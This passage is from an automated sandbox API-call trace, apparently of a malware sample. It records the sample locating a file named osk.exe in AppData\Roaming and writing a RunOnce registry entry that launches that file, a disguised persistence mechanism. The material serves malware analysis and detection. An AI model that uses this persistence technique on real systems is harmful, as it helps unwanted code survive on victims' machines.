ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.676] SetTimer (hWnd=0x20280, nIDEvent=0x2086, uElapse=0xa, lpTimerFunc=0x0) returned 0x2086 [0080.676] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.689] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.689] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.689] KillTimer (hWnd=0x20280, uIDEvent=0x2086) returned 1 [0080.689] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.689] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.689] IUnknown:Release (This=0x787518) returned 0x1 [0080.689] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.689] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.690] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.690] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.690] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.690] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.690] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.690] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.690] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.690] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xb [0080.690] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.690] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xc [0080.690] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.691] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xb [0080.691] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.691] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.691] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.691] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.691] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.691] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.691] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.692] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.692] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.692] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.692] RegCloseKey (hKey=0x280) returned 0x0 [0080.692] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.692] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.692] SetTimer (hWnd=0x20280, nIDEvent=0x2087, uElapse=0xa, lpTimerFunc=0x0) returned 0x2087 [0080.692] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.705] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.705] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.705] KillTimer (hWnd=0x20280, uIDEvent=0x2087) returned 1 [0080.705] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.705] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.705] IUnknown:Release (This=0x787518) returned 0x1 [0080.705] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.706] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.706] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.706] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.706] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.706] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.706] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.706] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.706] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.706] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xc [0080.706] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.706] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xd [0080.706] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.707] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xc [0080.707] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.707] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.707] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.707] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.707] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.708] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.708] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.708] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.708] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.708] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.708] RegCloseKey (hKey=0x280) returned 0x0 [0080.708] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.708] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.708] SetTimer (hWnd=0x20280, nIDEvent=0x2088, uElapse=0xa, lpTimerFunc=0x0) returned 0x2088 [0080.709] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.720] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.720] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.721] KillTimer (hWnd=0x20280, uIDEvent=0x2088) returned 1 [0080.721] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.721] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.721] IUnknown:Release (This=0x787518) returned 0x1 [0080.721] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.721] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.721] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.721] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.721] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.721] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.722] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.722] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.722] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.722] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xd [0080.722] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.722] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xe [0080.722] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.723] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xd [0080.723] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.723] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.723] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.723] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.723] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.723] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.723] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.723] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.724] lstrlenA 